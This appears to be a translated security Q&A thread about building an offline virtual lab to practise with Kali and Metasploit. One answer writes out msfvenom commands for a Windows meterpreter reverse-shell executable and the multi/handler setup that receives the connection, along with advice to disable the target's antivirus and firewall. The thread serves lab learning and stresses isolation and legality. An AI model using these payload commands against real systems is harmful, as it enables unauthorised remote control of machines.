¿Podemos hackear con nuestra propia computadora?

3

Recientemente he ganado interés en Kali, especialmente en marcos como Metasploit. Supongamos que solo tengo una computadora que no tiene acceso a Internet. Quiero aprender a usar herramientas y marcos en Kali como Metasploit. He encontrado muchos libros que explican cómo empezar en Metasploit. ¿Hay alguna forma en que pueda usar mi computadora como atacante y objetivo mientras estoy fuera de línea?

    
pregunta Meysam Ghahramani 18.03.2017 - 15:04
fuente

3 respuestas

5

Sí, pero en lugar de eso, use un software de virtualización como VirtualBox o VMware para instalar la máquina víctima o atacante (no desea que una máquina vulnerable esté conectada a Internet directamente). Lea libros como Metasploit: The Penetration Tester's Guide , es un gran libro escrito por el desarrollador de Metasploit. Sin embargo, muchas funcionalidades de Metasploit han cambiado desde el lanzamiento del libro y no hay una versión actualizada del mismo.
Por lo tanto, recomendaría leer Pruebas de penetración: una introducción práctica a la piratería . Es relativamente nuevo y un buen libro.

La configuración de laboratorio

A medida que lea los libros, le guiarán sobre cómo configurar su propio laboratorio de pruebas. Con cada paso en los detalles.

El problema

El máximo de libros comienza con Windows XP, pero desafortunadamente, Microsoft ha finalizado su soporte para Windows XP. Por lo tanto, tendrás dificultades para encontrar la configuración de XP. Incluso si logras encontrar Windows XP, la vulnerabilidad enumerada en los libros será parcheada (a menos que estés usando un laboratorio de pruebas de lápiz en línea, veré esto más adelante). Luego dirás "¿De qué sirve leer este libro?" ", le enseñará los conceptos básicos de las siguientes cosas," Cómo explotar vulnerabilidades conocidas "y muchas otras formas de" Cómo puede comprometer un sistema ".

En los próximos capítulos que encontrará, explotarán algunas vulnerabilidades conocidas y obtendrán acceso al sistema e intentarán enseñarle algo sobre la post-explotación (es decir, qué hacer cuando haya comprometido un sistema). Hay un capítulo completo sobre "Explotación posterior", pero tendrá que usar algunos trucos de la Explotación posterior de vez en cuando.
Le resultará frustrante no poder hacer nada con respecto a una vulnerabilidad parcheada. A continuación, describiré un pequeño truco para comprometer una computadora, de modo que pueda disfrutar de algo de Post-Explotación hasta los próximos capítulos.

Solución:

Suponiendo que hayas logrado encontrar Windows XP y las cosas están parchadas y quieres disfrutar de algo posterior a la explotación.

Siga los siguientes pasos:

Open a terminal

     msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip of your machine) LPORT=(port you want to connect back to) -f exe > filename.exe

Transfiera este archivo a la máquina víctima y deshabilite el cortafuegos de Windows y AV, ya que será detectado por cualquier AV (este no es un buen método para comprometer un sistema, sino para aprender algo sobre la Posoperación que puede usar). No abra el archivo, espere hasta que haya terminado con todos los pasos.

  Vuelve a abrir una terminal y escribe

   msfconsole

    use multi/handler

   set payload windows/meterpreter/reverse_tcp

   set LHOST XXX.XXX.XX.X

    set LPORT XXX

   run (no cierre este terminal, aquí obtendrá su sesión de meterpreter después de ejecutar el archivo en la máquina víctima)

  Cuando haya terminado con todos los pasos anteriores, puede ir a la máquina víctima y ejecutar el archivo exe generado.

¡Hoollaa! obtendrás una sesión de meterpreter y ahora puedes disfrutar de algo posterior a la explotación

NOTA


1- Lea cómo configurar su laboratorio del libro con cuidado, de lo contrario, el archivo exe generado no funcionará.
2- Puedes obtener tu dirección IP escribiendo ifconfig (todas estas cosas se mencionan en la sección de configuración de laboratorio, así que revisa).
3- Asegúrese de haber ingresado el mismo valor de LHOST y LPORT en el lugar especificado.

También puede aprender de SecurityTube sobre Metasploit en la sección Megaprimer. Los videos se pueden ver gratis, pero pueden suscribirse a ellos y usted puede obtener acceso a su laboratorio en línea. Entonces no tendrá que pasar por todos los problemas descritos anteriormente. Es tu elección.

Espero que esto pueda ayudarte.

ACTUALIZAR

El archivo generado anteriormente funcionará solo para Windows. Pero también puedes usar la distribución de Linux vulnerable como metasploitable. Se trata de una distribución de Linux vulnerable especialmente diseñada y encontrará varios tutoriales y libros sobre cómo explotar metasploitable.

    
respondido por el neferpitou 19.03.2017 - 04:08
fuente
1

En lugar de configurar su laboratorio por su cuenta. Existen herramientas que puede utilizar para configurar fácilmente.

Estas son aplicaciones vulnerables para que pruebes tus habilidades y trabajes en ellas usando Kali o metasploit para esa materia.

  1. Metasploitable2
  2. Metasploitable3
  3. DVWA

Hay una lista muy larga de aplicaciones para que las pruebes

Echa un vistazo a la lista owasp aquí

Dependiendo de lo que quieras aprender. Metasploit son principalmente para ataques basados en la red. Sin embargo, hay algunos ataques basados en web incorporados.

Puedes probar lo anterior con metasploit.

Las máquinas virtuales que pueden ser aprovechadas para su uso son para metasploit.

Si estás listo para un desafío. Puede descargar cualquier máquina de Windows, sin parchear y probarla.

Sin embargo debo iterar. NO HAGA PRUEBAS EN UNA MÁQUINA EN VIVO O EN UNA QUE NO SEA PROPIEDAD DE USTED.

    
respondido por el Lester T. 19.03.2017 - 05:35
fuente
-1

Primero y más importante:

UTILICE LA VM OFFLINE SOLO PARA "HACKING" CON KALI !!!

Si tus máquinas están en línea, estarás jugando un juego peligroso que mi profesor solía llamar "Puedes ser un delincuente si ..." Un pequeño error, como escribir una dirección IP o usar o atacar una computadora que usas no es de su propiedad, podría dar lugar a graves consecuencias. Esto puede ser castigado bajo CFAA por multas importantes y tiempo en prisión.

Máquinas virtuales: Con el descargo de responsabilidad fuera del camino, le recomendaría encarecidamente que ejecute tanto Kali Linux como cualquier otro objetivo u otras máquinas de prueba en Caja virtual de Oracle . Virtal Box es un software gratuito, también puede usar VMWare o cualquier otro software de virtualización que permita opciones de red. Una vez que tenga un sistema operativo instalado y actualizado en Virtual Box, puede hacer clic en la máquina virtual en la ventana principal y luego acceder a Configuración - > Red. Asegúrese de que esto lea "RED INTERNA". Eso asegurará que el tráfico NO pueda dejar la máquina ejecutando Virtual Box.

El sistema operativo: Recomendaría Windows XP SP0 para su máquina de destino inicial, ya que es particularmente vulnerable. El soporte para este software ha finalizado, pero si puede conseguir una copia, esto facilita los primeros esfuerzos de explotación. También hay una versión vulnerable de Linux llamada Metasploitable Linux que también es una buena máquina de prueba para los vectores de ataque de Linux.

Aprendizaje adicional: Si tuviera la oportunidad, configuraría una pequeña red de máquinas, posiblemente con funciones más avanzadas como Active Directory (o LDAP), servidores DNS y / o servidores web para alterar el Cross Site Scripting (XSS) usando BeEF .

Recuerde siempre probar y asegurarse de que no tiene conectividad a Internet antes de probar sus máquinas. ¡Diviértete y buena suerte!

    
respondido por el SuperAdmin 28.03.2017 - 23:43
fuente

Lea otras preguntas en las etiquetas